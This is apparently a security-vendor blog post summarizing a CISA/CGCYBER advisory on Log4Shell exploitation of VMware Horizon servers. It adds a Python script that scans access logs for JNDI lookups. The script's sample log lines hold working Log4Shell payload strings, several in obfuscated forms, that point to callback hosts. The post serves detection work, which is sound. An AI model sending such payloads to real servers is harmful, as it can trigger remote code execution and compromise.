Author: Kaustubh Jagtap, Product Marketing Director, SafeBreach

On June 23rd, the Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGCYBER) issued a joint advisory highlighting the ongoing exploitation of CVE-2021-44228 (Log4Shell) by several threat actors, including state-sponsored Advanced Persistent Threat (APT) groups. These actors are exploiting CVE-2021-44228 on VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds. According to the information released, multiple threat actors have continued to exploit Log4Shell on unpatched, public-facing VMware Horizon and UAG servers since December 2021. Additional details about this group and its associated tactics, techniques, and procedures (TTPs) are available in US-CERT Alert (AA22-174A) Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems.

These threat actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.

Additional Details of the CISA/CGCYBER Investigation

Log4j is maintained by the Apache Software Foundation (ASF), but the open-source component is used in a broad array of software on devices from many other vendors, including VMware, Cisco, IBM, and Oracle. The Log4Shell vulnerability was considered difficult to patch due to the range of end-user organizations, device manufacturers, and services affected by it.

After the vulnerability and its seriousness were first discovered in December 2021, CISA and CGCYBER conducted investigations at victim networks that showed attackers were using the vulnerability for more than installing “cryptojackers” or CPU-abusing crypto-mining malware. At one of the victims using a vulnerable version of VMware Horizon, the attackers had installed malware impersonating Microsoft’s software for admins.

At a second victim, the attackers first gained access to the VMware Horizon server and then used the Windows Remote Desktop Protocol (RDP) to gain access to hosts in the target’s production environment, including a security management server, a certificate server, a database containing sensitive law enforcement data, and a mail relay server. The attackers at the second victim site also used RDP to access the disaster recovery network.
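The advisory summarized above concerns exploitation of unpatched, public-facing Horizon and UAG servers. As an added, defender-side example (not code from the SafeBreach post or from the CISA/CGCYBER advisory), the Python script below scans web-server access-log lines for the Log4j JNDI lookup strings that such exploitation attempts leave behind, collapses the nested-lookup and percent-encoding obfuscations that defeat naive string matching, and pulls out the callback host and port so the destination can be blocked and hunted for in outbound traffic. The access-log lines, IP addresses, callback hosts and function names are constructed for this example.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in web access logs.

Added example for this post; not code from SafeBreach, CISA or CGCYBER.
The log lines, IP addresses and callback hosts below are constructed, and
the function names are this example's own.
"""
import re
import urllib.parse

# Innermost Log4j lookups that resolve to a plain string and are commonly
# used to hide the literal text "jndi:" from naive matching:
#   ${lower:J} / ${upper:j}   -> case conversion of the argument
#   ${env:NOPE:-j}, ${::-j}   -> default value when the lookup key is unset
_CASE_LOOKUP = re.compile(r"\$\{\s*(lower|upper)\s*:([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# After normalisation an attempt contains the JNDI lookup itself; capture the
# callback scheme, host and optional port for blocking and hunting.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}:]+)(?::(\d+))?", re.IGNORECASE)

# Constructed Apache combined-format lines: one benign request, four
# attempts using different obfuscations, and one harmless non-JNDI lookup.
SAMPLE_ACCESS_LOG = """\
192.0.2.10 - - [23/Jun/2022:10:15:01 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.11 - - [23/Jun/2022:10:15:07 +0000] "GET /portal/webclient/ HTTP/1.1" 200 5123 "-" "${jndi:ldap://198.51.100.7:1389/a}"
192.0.2.12 - - [23/Jun/2022:10:15:09 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fo%7D HTTP/1.1" 404 0 "-" "curl/7.79"
192.0.2.13 - - [23/Jun/2022:10:15:12 +0000] "GET / HTTP/1.1" 200 100 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/x}"
192.0.2.14 - - [23/Jun/2022:10:15:15 +0000] "GET /x HTTP/1.1" 200 100 "-" "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap://203.0.113.9/z}"
192.0.2.15 - - [23/Jun/2022:10:16:00 +0000] "GET /blog/${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""


def normalize_lookups(text: str) -> str:
    """Resolve percent-encoding and nested case/default lookups so that the
    obfuscated variants collapse to the same form as the plain payload."""
    # Payloads are often percent-encoded (sometimes twice) to pass proxies.
    for _ in range(3):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    # Rewrite innermost lookups until nothing changes (bounded, no infinite loop).
    for _ in range(20):
        rewritten = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        rewritten = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), rewritten)
        if rewritten == text:
            break
        text = rewritten
    return text


def find_log4shell_attempts(log_lines):
    """Return one finding per log line that carries a JNDI lookup, with the
    source IP (first field of a combined-format line), the normalised payload
    and the callback scheme/host/port."""
    findings = []
    for line_no, raw in enumerate(log_lines, start=1):
        normalized = normalize_lookups(raw)
        m = _JNDI.search(normalized)
        if not m:
            continue
        findings.append({
            "line": line_no,
            "source_ip": raw.split(" ", 1)[0],
            "scheme": m.group(1).lower(),
            "callback_host": m.group(2),
            "callback_port": int(m.group(3)) if m.group(3) else None,
            "normalized": normalized,
        })
    return findings


def callback_hosts(findings):
    """Distinct callback destinations, the first thing to block and to search
    for in outbound connection logs."""
    return sorted({f["callback_host"] for f in findings})


if __name__ == "__main__":
    hits = find_log4shell_attempts(SAMPLE_ACCESS_LOG.splitlines())
    for hit in hits:
        print(f"line {hit['line']}: {hit['source_ip']} -> {hit['scheme']}://"
              f"{hit['callback_host']}:{hit['callback_port']}")
    print("callback hosts to block:", callback_hosts(hits))
```

A hit shows an attempt, not a confirmed compromise; the follow-up is to check whether the server made an outbound LDAP/RMI connection to the reported callback host around that timestamp, and whether the Horizon or UAG host was actually running a vulnerable Log4j at the time. Field positions differ between log formats, so adapt the source-IP extraction when running this against Horizon or UAG logs rather than a combined-format access log.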